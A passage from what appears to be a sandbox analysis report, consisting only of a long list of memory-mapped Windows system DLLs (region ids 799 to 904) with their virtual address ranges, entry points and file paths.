"c:\\windows\\shellexperiences\\tilecontrol.dll") Region: id = 799 start_va = 0x7ffc0bc10000 end_va = 0x7ffc0be5afff monitored = 0 entry_point = 0x7ffc0bdabfa0 region_type = mapped_file name = "windowsinternal.composableshell.experiences.switcher.dll" filename = "\\Windows\\ShellComponents\\WindowsInternal.ComposableShell.Experiences.Switcher.dll" (normalized: "c:\\windows\\shellcomponents\\windowsinternal.composableshell.experiences.switcher.dll") Region: id = 800 start_va = 0x7ffc0be60000 end_va = 0x7ffc0c01bfff monitored = 0 entry_point = 0x7ffc0be8b1f0 region_type = mapped_file name = "cdprt.dll" filename = "\\Windows\\System32\\cdprt.dll" (normalized: "c:\\windows\\system32\\cdprt.dll") Region: id = 801 start_va = 0x7ffc0c020000 end_va = 0x7ffc0c238fff monitored = 0 entry_point = 0x7ffc0c02daf0 region_type = mapped_file name = "pnidui.dll" filename = "\\Windows\\System32\\pnidui.dll" (normalized: "c:\\windows\\system32\\pnidui.dll") Region: id = 802 start_va = 0x7ffc0c240000 end_va = 0x7ffc0c282fff monitored = 0 entry_point = 0x7ffc0c241810 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 803 start_va = 0x7ffc0c290000 end_va = 0x7ffc0c29cfff monitored = 0 entry_point = 0x7ffc0c294630 region_type = mapped_file name = "atlthunk.dll" filename = "\\Windows\\System32\\atlthunk.dll" (normalized: "c:\\windows\\system32\\atlthunk.dll") Region: id = 804 start_va = 0x7ffc0c2a0000 end_va = 0x7ffc0c300fff monitored = 0 entry_point = 0x7ffc0c2e1980 region_type = mapped_file name = "windows.fileexplorer.common.dll" filename = "\\Windows\\System32\\Windows.FileExplorer.Common.dll" (normalized: "c:\\windows\\system32\\windows.fileexplorer.common.dll") Region: id = 805 start_va = 0x7ffc0c310000 end_va = 0x7ffc0c328fff monitored = 0 entry_point = 0x7ffc0c312820 region_type = mapped_file name = "syncreg.dll" filename = "\\Windows\\System32\\Syncreg.dll" (normalized: "c:\\windows\\system32\\syncreg.dll") Region: id = 806 start_va = 0x7ffc0c330000 end_va = 0x7ffc0c370fff monitored = 0 entry_point = 0x7ffc0c331e00 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 807 start_va = 0x7ffc0c380000 end_va = 0x7ffc0c3f9fff monitored = 0 entry_point = 0x7ffc0c382550 region_type = mapped_file name = "dxp.dll" filename = "\\Windows\\System32\\DXP.dll" (normalized: "c:\\windows\\system32\\dxp.dll") Region: id = 808 start_va = 0x7ffc0c660000 end_va = 0x7ffc0c88dfff monitored = 0 entry_point = 0x7ffc0c6735e0 region_type = mapped_file name = "icu.dll" filename = "\\Windows\\System32\\icu.dll" (normalized: "c:\\windows\\system32\\icu.dll") Region: id = 809 start_va = 0x7ffc0ec90000 end_va = 0x7ffc0eccdfff monitored = 0 entry_point = 0x7ffc0ec938e0 region_type = mapped_file name = "prnfldr.dll" filename = "\\Windows\\System32\\prnfldr.dll" (normalized: "c:\\windows\\system32\\prnfldr.dll") Region: id = 810 start_va = 0x7ffc0ecd0000 end_va = 0x7ffc0ecddfff monitored = 0 entry_point = 0x7ffc0ecd26d0 region_type = mapped_file name = "windows.ui.shell.dll" filename = "\\Windows\\System32\\Windows.UI.Shell.dll" (normalized: "c:\\windows\\system32\\windows.ui.shell.dll") Region: id = 811 start_va = 0x7ffc0ece0000 end_va = 0x7ffc0ed1efff monitored = 0 entry_point = 0x7ffc0ecfe5f0 region_type = mapped_file name = "capabilityaccessmanagerclient.dll" filename = "\\Windows\\System32\\CapabilityAccessManagerClient.dll" (normalized: "c:\\windows\\system32\\capabilityaccessmanagerclient.dll") Region: id = 812 start_va = 0x7ffc0ed20000 end_va = 0x7ffc0ed70fff monitored = 0 entry_point = 0x7ffc0ed27350 region_type = mapped_file name = "stobject.dll" filename = "\\Windows\\System32\\stobject.dll" (normalized: "c:\\windows\\system32\\stobject.dll") Region: id = 813 start_va = 0x7ffc0eda0000 end_va = 0x7ffc0edcffff monitored = 0 entry_point = 0x7ffc0edabe20 region_type = mapped_file name = "rtworkq.dll" filename = "\\Windows\\System32\\RTWorkQ.dll" (normalized: "c:\\windows\\system32\\rtworkq.dll") Region: id = 814 start_va = 0x7ffc0edd0000 end_va = 0x7ffc0ef8afff monitored = 0 entry_point = 0x7ffc0ee04590 region_type = mapped_file name = "mfplat.dll" filename = "\\Windows\\System32\\mfplat.dll" (normalized: "c:\\windows\\system32\\mfplat.dll") Region: id = 815 start_va = 0x7ffc10400000 end_va = 0x7ffc1045dfff monitored = 0 entry_point = 0x7ffc104024d0 region_type = mapped_file name = "wpnclient.dll" filename = "\\Windows\\System32\\wpnclient.dll" (normalized: "c:\\windows\\system32\\wpnclient.dll") Region: id = 816 start_va = 0x7ffc105e0000 end_va = 0x7ffc10609fff monitored = 0 entry_point = 0x7ffc105ef730 region_type = mapped_file name = "windows.internal.system.userprofile.dll" filename = "\\Windows\\System32\\Windows.Internal.System.UserProfile.dll" (normalized: "c:\\windows\\system32\\windows.internal.system.userprofile.dll") Region: id = 817 start_va = 0x7ffc10e30000 end_va = 0x7ffc10e80fff monitored = 0 entry_point = 0x7ffc10e62fd0 region_type = mapped_file name = "capauthz.dll" filename = "\\Windows\\System32\\capauthz.dll" (normalized: "c:\\windows\\system32\\capauthz.dll") Region: id = 818 start_va = 0x7ffc10e90000 end_va = 0x7ffc10efffff monitored = 0 entry_point = 0x7ffc10ea3d40 region_type = mapped_file name = "cryptngc.dll" filename = "\\Windows\\System32\\cryptngc.dll" (normalized: "c:\\windows\\system32\\cryptngc.dll") Region: id = 819 start_va = 0x7ffc10f00000 end_va = 0x7ffc10faefff monitored = 0 entry_point = 0x7ffc10f044f0 region_type = mapped_file name = "shellcommoncommonproxystub.dll" filename = "\\Windows\\System32\\ShellCommonCommonProxyStub.dll" (normalized: "c:\\windows\\system32\\shellcommoncommonproxystub.dll") Region: id = 820 start_va = 0x7ffc10fb0000 end_va = 0x7ffc110b8fff monitored = 0 entry_point = 0x7ffc10fd7910 region_type = mapped_file name = "windows.ui.core.textinput.dll" filename = "\\Windows\\System32\\Windows.UI.Core.TextInput.dll" (normalized: "c:\\windows\\system32\\windows.ui.core.textinput.dll") Region: id = 821 start_va = 0x7ffc110c0000 end_va = 0x7ffc1113ffff monitored = 0 entry_point = 0x7ffc1110b0c0 region_type = mapped_file name = "dictationmanager.dll" filename = "\\Windows\\System32\\DictationManager.dll" (normalized: "c:\\windows\\system32\\dictationmanager.dll") Region: id = 822 start_va = 0x7ffc11140000 end_va = 0x7ffc11319fff monitored = 0 entry_point = 0x7ffc11161560 region_type = mapped_file name = "windowsudk.shellcommon.dll" filename = "\\Windows\\System32\\windowsudk.shellcommon.dll" (normalized: "c:\\windows\\system32\\windowsudk.shellcommon.dll") Region: id = 823 start_va = 0x7ffc11320000 end_va = 0x7ffc113a6fff monitored = 0 entry_point = 0x7ffc11321e10 region_type = mapped_file name = "windows.data.activities.dll" filename = "\\Windows\\System32\\Windows.Data.Activities.dll" (normalized: "c:\\windows\\system32\\windows.data.activities.dll") Region: id = 824 start_va = 0x7ffc113b0000 end_va = 0x7ffc1152bfff monitored = 0 entry_point = 0x7ffc11496f30 region_type = mapped_file name = "taskflowdataengine.dll" filename = "\\Windows\\System32\\TaskFlowDataEngine.dll" (normalized: "c:\\windows\\system32\\taskflowdataengine.dll") Region: id = 825 start_va = 0x7ffc11600000 end_va = 0x7ffc1170ffff monitored = 0 entry_point = 0x7ffc116b3a20 region_type = mapped_file name = "windows.internal.signals.dll" filename = "\\Windows\\System32\\Windows.Internal.Signals.dll" (normalized: "c:\\windows\\system32\\windows.internal.signals.dll") Region: id = 826 start_va = 0x7ffc11710000 end_va = 0x7ffc117d2fff monitored = 0 entry_point = 0x7ffc1171e000 region_type = mapped_file name = "windows.web.dll" filename = "\\Windows\\System32\\Windows.Web.dll" (normalized: "c:\\windows\\system32\\windows.web.dll") Region: id = 827 start_va = 0x7ffc117e0000 end_va = 0x7ffc1184bfff monitored = 0 entry_point = 0x7ffc117ed1e0 region_type = mapped_file name = "abovelockapphost.dll" filename = "\\Windows\\System32\\AboveLockAppHost.dll" (normalized: "c:\\windows\\system32\\abovelockapphost.dll") Region: id = 828 start_va = 0x7ffc11850000 end_va = 0x7ffc118ccfff monitored = 0 entry_point = 0x7ffc11858340 region_type = mapped_file name = "synccenter.dll" filename = "\\Windows\\System32\\SyncCenter.dll" (normalized: "c:\\windows\\system32\\synccenter.dll") Region: id = 829 start_va = 0x7ffc118d0000 end_va = 0x7ffc118ebfff monitored = 0 entry_point = 0x7ffc118deb20 region_type = mapped_file name = "virtualmonitormanager.dll" filename = "\\Windows\\System32\\VirtualMonitorManager.dll" (normalized: "c:\\windows\\system32\\virtualmonitormanager.dll") Region: id = 830 start_va = 0x7ffc118f0000 end_va = 0x7ffc119c2fff monitored = 0 entry_point = 0x7ffc11971ad0 region_type = mapped_file name = "holographicextensions.dll" filename = "\\Windows\\System32\\HolographicExtensions.dll" (normalized: "c:\\windows\\system32\\holographicextensions.dll") Region: id = 831 start_va = 0x7ffc119d0000 end_va = 0x7ffc119defff monitored = 0 entry_point = 0x7ffc119d1450 region_type = mapped_file name = "batmeter.dll" filename = "\\Windows\\System32\\batmeter.dll" (normalized: "c:\\windows\\system32\\batmeter.dll") Region: id = 832 start_va = 0x7ffc11c90000 end_va = 0x7ffc11eedfff monitored = 0 entry_point = 0x7ffc11cf8a80 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 833 start_va = 0x7ffc12120000 end_va = 0x7ffc1215bfff monitored = 0 entry_point = 0x7ffc121268a0 region_type = mapped_file name = "wscinterop.dll" filename = "\\Windows\\System32\\wscinterop.dll" (normalized: "c:\\windows\\system32\\wscinterop.dll") Region: id = 834 start_va = 0x7ffc121d0000 end_va = 0x7ffc1224cfff monitored = 0 entry_point = 0x7ffc121d26f0 region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll") Region: id = 835 start_va = 0x7ffc12460000 end_va = 0x7ffc1252cfff monitored = 0 entry_point = 0x7ffc12465b60 region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll") Region: id = 836 start_va = 0x7ffc12530000 end_va = 0x7ffc125dafff monitored = 0 entry_point = 0x7ffc12560af0 region_type = mapped_file name = "applicationframe.dll" filename = "\\Windows\\System32\\ApplicationFrame.dll" (normalized: "c:\\windows\\system32\\applicationframe.dll") Region: id = 837 start_va = 0x7ffc125e0000 end_va = 0x7ffc12628fff monitored = 0 entry_point = 0x7ffc125e3550 region_type = mapped_file name = "pdh.dll" filename = "\\Windows\\System32\\pdh.dll" (normalized: "c:\\windows\\system32\\pdh.dll") Region: id = 838 start_va = 0x7ffc12630000 end_va = 0x7ffc12c1dfff monitored = 0 entry_point = 0x7ffc126e4e60 region_type = mapped_file name = "twinui.dll" filename = "\\Windows\\System32\\twinui.dll" (normalized: "c:\\windows\\system32\\twinui.dll") Region: id = 839 start_va = 0x7ffc12c20000 end_va = 0x7ffc12c9cfff monitored = 0 entry_point = 0x7ffc12c317b0 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 840 start_va = 0x7ffc12ca0000 end_va = 0x7ffc12cb0fff monitored = 0 entry_point = 0x7ffc12ca12e0 region_type = mapped_file name = "credui.dll" filename = "\\Windows\\System32\\credui.dll" (normalized: "c:\\windows\\system32\\credui.dll") Region: id = 841 start_va = 0x7ffc12cc0000 end_va = 0x7ffc12cf6fff monitored = 0 entry_point = 0x7ffc12cc2e30 region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 842 start_va = 0x7ffc12d00000 end_va = 0x7ffc12d26fff monitored = 0 entry_point = 0x7ffc12d04220 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 843 start_va = 0x7ffc12f30000 end_va = 0x7ffc12f3bfff monitored = 0 entry_point = 0x7ffc12f32560 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 844 start_va = 0x7ffc130c0000 end_va = 0x7ffc130e3fff monitored = 0 entry_point = 0x7ffc130c1790 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\System32\\edputil.dll" (normalized: "c:\\windows\\system32\\edputil.dll") Region: id = 845 start_va = 0x7ffc130f0000 end_va = 0x7ffc13155fff monitored = 0 entry_point = 0x7ffc1310d000 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 846 start_va = 0x7ffc133c0000 end_va = 0x7ffc1398cfff monitored = 0 entry_point = 0x7ffc13449030 region_type = mapped_file name = "twinui.pcshell.dll" filename = "\\Windows\\System32\\twinui.pcshell.dll" (normalized: "c:\\windows\\system32\\twinui.pcshell.dll") Region: id = 847 start_va = 0x7ffc13990000 end_va = 0x7ffc13baefff monitored = 0 entry_point = 0x7ffc13a16f20 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 848 start_va = 0x7ffc13bb0000 end_va = 0x7ffc13bedfff monitored = 0 entry_point = 0x7ffc13bb7f40 region_type = mapped_file name = "dataexchange.dll" filename = "\\Windows\\System32\\DataExchange.dll" (normalized: "c:\\windows\\system32\\dataexchange.dll") Region: id = 849 start_va = 0x7ffc13bf0000 end_va = 0x7ffc13c55fff monitored = 0 entry_point = 0x7ffc13bfeb60 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 850 start_va = 0x7ffc13c60000 end_va = 0x7ffc13caffff monitored = 0 entry_point = 0x7ffc13c6a9a0 region_type = mapped_file name = "sndvolsso.dll" filename = "\\Windows\\System32\\SndVolSSO.dll" (normalized: "c:\\windows\\system32\\sndvolsso.dll") Region: id = 851 start_va = 0x7ffc13cb0000 end_va = 0x7ffc14232fff monitored = 0 entry_point = 0x7ffc13dd4880 region_type = mapped_file name = "starttiledata.dll" filename = "\\Windows\\System32\\StartTileData.dll" (normalized: "c:\\windows\\system32\\starttiledata.dll") Region: id = 852 start_va = 0x7ffc14240000 end_va = 0x7ffc144d9fff monitored = 0 entry_point = 0x7ffc142d96c0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1_none_b555e41d4684ddec\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1_none_b555e41d4684ddec\\comctl32.dll") Region: id = 853 start_va = 0x7ffc144e0000 end_va = 0x7ffc14588fff monitored = 0 entry_point = 0x7ffc144ee040 region_type = mapped_file name = "twinapi.dll" filename = "\\Windows\\System32\\twinapi.dll" (normalized: "c:\\windows\\system32\\twinapi.dll") Region: id = 854 start_va = 0x7ffc14590000 end_va = 0x7ffc1461afff monitored = 0 entry_point = 0x7ffc145a7060 region_type = mapped_file name = "aepic.dll" filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll") Region: id = 855 start_va = 0x7ffc14630000 end_va = 0x7ffc1468dfff monitored = 0 entry_point = 0x7ffc14632ba0 region_type = mapped_file name = "notificationcontrollerps.dll" filename = "\\Windows\\System32\\NotificationControllerPS.dll" (normalized: "c:\\windows\\system32\\notificationcontrollerps.dll") Region: id = 856 start_va = 0x7ffc146f0000 end_va = 0x7ffc14833fff monitored = 0 entry_point = 0x7ffc1470bfd0 region_type = mapped_file name = "wpnapps.dll" filename = "\\Windows\\System32\\wpnapps.dll" (normalized: "c:\\windows\\system32\\wpnapps.dll") Region: id = 857 start_va = 0x7ffc14840000 end_va = 0x7ffc148cffff monitored = 0 entry_point = 0x7ffc148a2720 region_type = mapped_file name = "appresolver.dll" filename = "\\Windows\\System32\\AppResolver.dll" (normalized: "c:\\windows\\system32\\appresolver.dll") Region: id = 858 start_va = 0x7ffc148d0000 end_va = 0x7ffc1490ffff monitored = 0 entry_point = 0x7ffc148d5af0 region_type = mapped_file name = "windows.staterepositoryclient.dll" filename = "\\Windows\\System32\\Windows.StateRepositoryClient.dll" (normalized: "c:\\windows\\system32\\windows.staterepositoryclient.dll") Region: id = 859 start_va = 0x7ffc14940000 end_va = 0x7ffc149f7fff monitored = 0 entry_point = 0x7ffc1494d870 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 860 start_va = 0x7ffc14a00000 end_va = 0x7ffc14a98fff monitored = 0 entry_point = 0x7ffc14a0e1c0 region_type = mapped_file name = "tiledatarepository.dll" filename = "\\Windows\\System32\\TileDataRepository.dll" (normalized: "c:\\windows\\system32\\tiledatarepository.dll") Region: id = 861 start_va = 0x7ffc150d0000 end_va = 0x7ffc15116fff monitored = 0 entry_point = 0x7ffc150fdc00 region_type = mapped_file name = "container.dll" filename = "\\Windows\\System32\\container.dll" (normalized: "c:\\windows\\system32\\container.dll") Region: id = 862 start_va = 0x7ffc15120000 end_va = 0x7ffc1512afff monitored = 0 entry_point = 0x7ffc15123070 region_type = mapped_file name = "fltlib.dll" filename = "\\Windows\\System32\\fltLib.dll" (normalized: "c:\\windows\\system32\\fltlib.dll") Region: id = 863 start_va = 0x7ffc15130000 end_va = 0x7ffc151ddfff monitored = 0 entry_point = 0x7ffc1519f9d0 region_type = mapped_file name = "daxexec.dll" filename = "\\Windows\\System32\\daxexec.dll" (normalized: "c:\\windows\\system32\\daxexec.dll") Region: id = 864 start_va = 0x7ffc15280000 end_va = 0x7ffc1529ffff monitored = 0 entry_point = 0x7ffc15288480 region_type = mapped_file name = "windows.staterepositorybroker.dll" filename = "\\Windows\\System32\\Windows.StateRepositoryBroker.dll" (normalized: "c:\\windows\\system32\\windows.staterepositorybroker.dll") Region: id = 865 start_va = 0x7ffc152a0000 end_va = 0x7ffc15339fff monitored = 0 entry_point = 0x7ffc152a60e0 region_type = mapped_file name = "uiamanager.dll" filename = "\\Windows\\System32\\UiaManager.dll" (normalized: "c:\\windows\\system32\\uiamanager.dll") Region: id = 866 start_va = 0x7ffc15340000 end_va = 0x7ffc153e4fff monitored = 0 entry_point = 0x7ffc153467f0 region_type = mapped_file name = "twinui.appcore.dll" filename = "\\Windows\\System32\\twinui.appcore.dll" (normalized: "c:\\windows\\system32\\twinui.appcore.dll") Region: id = 867 start_va = 0x7ffc15410000 end_va = 0x7ffc154cbfff monitored = 0 entry_point = 0x7ffc1548d430 region_type = mapped_file name = "windows.system.launcher.dll" filename = "\\Windows\\System32\\Windows.System.Launcher.dll" (normalized: "c:\\windows\\system32\\windows.system.launcher.dll") Region: id = 868 start_va = 0x7ffc15910000 end_va = 0x7ffc15927fff monitored = 0 entry_point = 0x7ffc15911bf0 region_type = mapped_file name = "execmodelproxy.dll" filename = "\\Windows\\System32\\execmodelproxy.dll" (normalized: "c:\\windows\\system32\\execmodelproxy.dll") Region: id = 869 start_va = 0x7ffc16100000 end_va = 0x7ffc16158fff monitored = 0 entry_point = 0x7ffc1610daa0 region_type = mapped_file name = "execmodelclient.dll" filename = "\\Windows\\System32\\ExecModelClient.dll" (normalized: "c:\\windows\\system32\\execmodelclient.dll") Region: id = 870 start_va = 0x7ffc16160000 end_va = 0x7ffc16208fff monitored = 0 entry_point = 0x7ffc16169a00 region_type = mapped_file name = "wlidprov.dll" filename = "\\Windows\\System32\\wlidprov.dll" (normalized: "c:\\windows\\system32\\wlidprov.dll") Region: id = 871 start_va = 0x7ffc162c0000 end_va = 0x7ffc163d6fff monitored = 0 entry_point = 0x7ffc1631cbc0 region_type = mapped_file name = "settingsynccore.dll" filename = "\\Windows\\System32\\SettingSyncCore.dll" (normalized: "c:\\windows\\system32\\settingsynccore.dll") Region: id = 872 start_va = 0x7ffc16420000 end_va = 0x7ffc16507fff monitored = 0 entry_point = 0x7ffc1646f5b0 region_type = mapped_file name = "windows.cloudstore.schema.shell.dll" filename = "\\Windows\\System32\\Windows.CloudStore.Schema.Shell.dll" (normalized: "c:\\windows\\system32\\windows.cloudstore.schema.shell.dll") Region: id = 873 start_va = 0x7ffc16570000 end_va = 0x7ffc165a6fff monitored = 0 entry_point = 0x7ffc16578c10 region_type = mapped_file name = "appextension.dll" filename = "\\Windows\\System32\\AppExtension.dll" (normalized: "c:\\windows\\system32\\appextension.dll") Region: id = 874 start_va = 0x7ffc16650000 end_va = 0x7ffc1667efff monitored = 0 entry_point = 0x7ffc1666ac30 region_type = mapped_file name = "cflapi.dll" filename = "\\Windows\\System32\\cflapi.dll" (normalized: "c:\\windows\\system32\\cflapi.dll") Region: id = 875 start_va = 0x7ffc16680000 end_va = 0x7ffc166d3fff monitored = 0 entry_point = 0x7ffc166b6a80 region_type = mapped_file name = "windows.shell.bluelightreduction.dll" filename = "\\Windows\\System32\\Windows.Shell.BlueLightReduction.dll" (normalized: "c:\\windows\\system32\\windows.shell.bluelightreduction.dll") Region: id = 876 start_va = 0x7ffc166e0000 end_va = 0x7ffc16714fff monitored = 0 entry_point = 0x7ffc166ff4a0 region_type = mapped_file name = "npsm.dll" filename = "\\Windows\\System32\\NPSM.dll" (normalized: "c:\\windows\\system32\\npsm.dll") Region: id = 877 start_va = 0x7ffc167b0000 end_va = 0x7ffc168ccfff monitored = 0 entry_point = 0x7ffc167cdc60 region_type = mapped_file name = "windows.security.authentication.web.core.dll" filename = "\\Windows\\System32\\Windows.Security.Authentication.Web.Core.dll" (normalized: "c:\\windows\\system32\\windows.security.authentication.web.core.dll") Region: id = 878 start_va = 0x7ffc16ce0000 end_va = 0x7ffc16d0bfff monitored = 0 entry_point = 0x7ffc16cfb730 region_type = mapped_file name = "dbgcore.dll" filename = "\\Windows\\System32\\dbgcore.dll" (normalized: "c:\\windows\\system32\\dbgcore.dll") Region: id = 879 start_va = 0x7ffc16d10000 end_va = 0x7ffc16ef3fff monitored = 0 entry_point = 0x7ffc16d2a770 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 880 start_va = 0x7ffc16fa0000 end_va = 0x7ffc1743dfff monitored = 0 entry_point = 0x7ffc16ff1e80 region_type = mapped_file name = "cdp.dll" filename = "\\Windows\\System32\\cdp.dll" (normalized: "c:\\windows\\system32\\cdp.dll") Region: id = 881 start_va = 0x7ffc174c0000 end_va = 0x7ffc174dcfff monitored = 0 entry_point = 0x7ffc174c6080 region_type = mapped_file name = "windows.shell.servicehostbuilder.dll" filename = "\\Windows\\System32\\Windows.Shell.ServiceHostBuilder.dll" (normalized: "c:\\windows\\system32\\windows.shell.servicehostbuilder.dll") Region: id = 882 start_va = 0x7ffc17500000 end_va = 0x7ffc17511fff monitored = 0 entry_point = 0x7ffc17503330 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 883 start_va = 0x7ffc17590000 end_va = 0x7ffc175acfff monitored = 0 entry_point = 0x7ffc175928d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 884 start_va = 0x7ffc176c0000 end_va = 0x7ffc1773cfff monitored = 0 entry_point = 0x7ffc176c3a80 region_type = mapped_file name = "onecorecommonproxystub.dll" filename = "\\Windows\\System32\\OneCoreCommonProxyStub.dll" (normalized: "c:\\windows\\system32\\onecorecommonproxystub.dll") Region: id = 885 start_va = 0x7ffc177a0000 end_va = 0x7ffc177b1fff monitored = 0 entry_point = 0x7ffc177a7280 region_type = mapped_file name = "efsutil.dll" filename = "\\Windows\\System32\\efsutil.dll" (normalized: "c:\\windows\\system32\\efsutil.dll") Region: id = 886 start_va = 0x7ffc177c0000 end_va = 0x7ffc17878fff monitored = 0 entry_point = 0x7ffc177cd080 region_type = mapped_file name = "settingsync.dll" filename = "\\Windows\\System32\\SettingSync.dll" (normalized: "c:\\windows\\system32\\settingsync.dll") Region: id = 887 start_va = 0x7ffc17880000 end_va = 0x7ffc17a73fff monitored = 0 entry_point = 0x7ffc17904bf0 region_type = mapped_file name = "windows.cloudstore.dll" filename = "\\Windows\\System32\\Windows.CloudStore.dll" (normalized: "c:\\windows\\system32\\windows.cloudstore.dll") Region: id = 888 start_va = 0x7ffc17ad0000 end_va = 0x7ffc17af7fff monitored = 0 entry_point = 0x7ffc17ad2110 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 889 start_va = 0x7ffc17fb0000 end_va = 0x7ffc17fdafff monitored = 0 entry_point = 0x7ffc17fb6c40 region_type = mapped_file name = "idstore.dll" filename = "\\Windows\\System32\\IDStore.dll" (normalized: "c:\\windows\\system32\\idstore.dll") Region: id = 890 start_va = 0x7ffc17fe0000 end_va = 0x7ffc1805ffff monitored = 0 entry_point = 0x7ffc17fe90a0 region_type = mapped_file name = "photometadatahandler.dll" filename = "\\Windows\\System32\\PhotoMetadataHandler.dll" (normalized: "c:\\windows\\system32\\photometadatahandler.dll") Region: id = 891 start_va = 0x7ffc18170000 end_va = 0x7ffc1819dfff monitored = 0 entry_point = 0x7ffc1818a9a0 region_type = mapped_file name = "windowsinternal.composableshell.desktophosting.dll" filename = "\\Windows\\System32\\WindowsInternal.ComposableShell.DesktopHosting.dll" (normalized: "c:\\windows\\system32\\windowsinternal.composableshell.desktophosting.dll") Region: id = 892 start_va = 0x7ffc182f0000 end_va = 0x7ffc1833bfff monitored = 0 entry_point = 0x7ffc182f5fd0 region_type = mapped_file name = "wscapi.dll" filename = "\\Windows\\System32\\wscapi.dll" (normalized: "c:\\windows\\system32\\wscapi.dll") Region: id = 893 start_va = 0x7ffc18520000 end_va = 0x7ffc18571fff monitored = 0 entry_point = 0x7ffc18545540 region_type = mapped_file name = "smartscreenps.dll" filename = "\\Windows\\System32\\smartscreenps.dll" (normalized: "c:\\windows\\system32\\smartscreenps.dll") Region: id = 894 start_va = 0x7ffc18d80000 end_va = 0x7ffc18e45fff monitored = 0 entry_point = 0x7ffc18db3f00 region_type = mapped_file name = "windows.storage.search.dll" filename = "\\Windows\\System32\\Windows.Storage.Search.dll" (normalized: "c:\\windows\\system32\\windows.storage.search.dll") Region: id = 895 start_va = 0x7ffc18ee0000 end_va = 0x7ffc18efffff monitored = 0 entry_point = 0x7ffc18ef7360 region_type = mapped_file name = "devdispitemprovider.dll" filename = "\\Windows\\System32\\DevDispItemProvider.dll" (normalized: "c:\\windows\\system32\\devdispitemprovider.dll") Region: id = 896 start_va = 0x7ffc18f00000 end_va = 0x7ffc18f44fff monitored = 0 entry_point = 0x7ffc18f0aef0 region_type = mapped_file name = "mswb7.dll" filename = "\\Windows\\System32\\MSWB7.dll" (normalized: "c:\\windows\\system32\\mswb7.dll") Region: id = 897 start_va = 0x7ffc18f50000 end_va = 0x7ffc18ffbfff monitored = 0 entry_point = 0x7ffc18f7d6a0 region_type = mapped_file name = "structuredquery.dll" filename = "\\Windows\\System32\\StructuredQuery.dll" (normalized: "c:\\windows\\system32\\structuredquery.dll") Region: id = 898 start_va = 0x7ffc19000000 end_va = 0x7ffc19086fff monitored = 0 entry_point = 0x7ffc1900e4d0 region_type = mapped_file name = "windows.devices.enumeration.dll" filename = "\\Windows\\System32\\Windows.Devices.Enumeration.dll" (normalized: "c:\\windows\\system32\\windows.devices.enumeration.dll") Region: id = 899 start_va = 0x7ffc19090000 end_va = 0x7ffc19112fff monitored = 0 entry_point = 0x7ffc190940e0 region_type = mapped_file name = "imapi2.dll" filename = "\\Windows\\System32\\imapi2.dll" (normalized: "c:\\windows\\system32\\imapi2.dll") Region: id = 900 start_va = 0x7ffc19120000 end_va = 0x7ffc19159fff monitored = 0 entry_point = 0x7ffc191251c0 region_type = mapped_file name = "srchadmin.dll" filename = "\\Windows\\System32\\srchadmin.dll" (normalized: "c:\\windows\\system32\\srchadmin.dll") Region: id = 901 start_va = 0x7ffc19160000 end_va = 0x7ffc191affff monitored = 0 entry_point = 0x7ffc19162520 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 902 start_va = 0x7ffc19250000 end_va = 0x7ffc192a2fff monitored = 0 entry_point = 0x7ffc19258810 region_type = mapped_file name = "actioncenter.dll" filename = "\\Windows\\System32\\ActionCenter.dll" (normalized: "c:\\windows\\system32\\actioncenter.dll") Region: id = 903 start_va = 0x7ffc192b0000 end_va = 0x7ffc192bbfff monitored = 0 entry_point = 0x7ffc192b1690 region_type = mapped_file name = "nlmproxy.dll" filename = "\\Windows\\System32\\nlmproxy.dll" (normalized: "c:\\windows\\system32\\nlmproxy.dll") Region: id = 904 start_va = 0x7ffc194a0000 end_va = 0x7ffc19979fff monitored = 0 entry_point = 0x7ffc1956c180 region_type = mapped_file name = 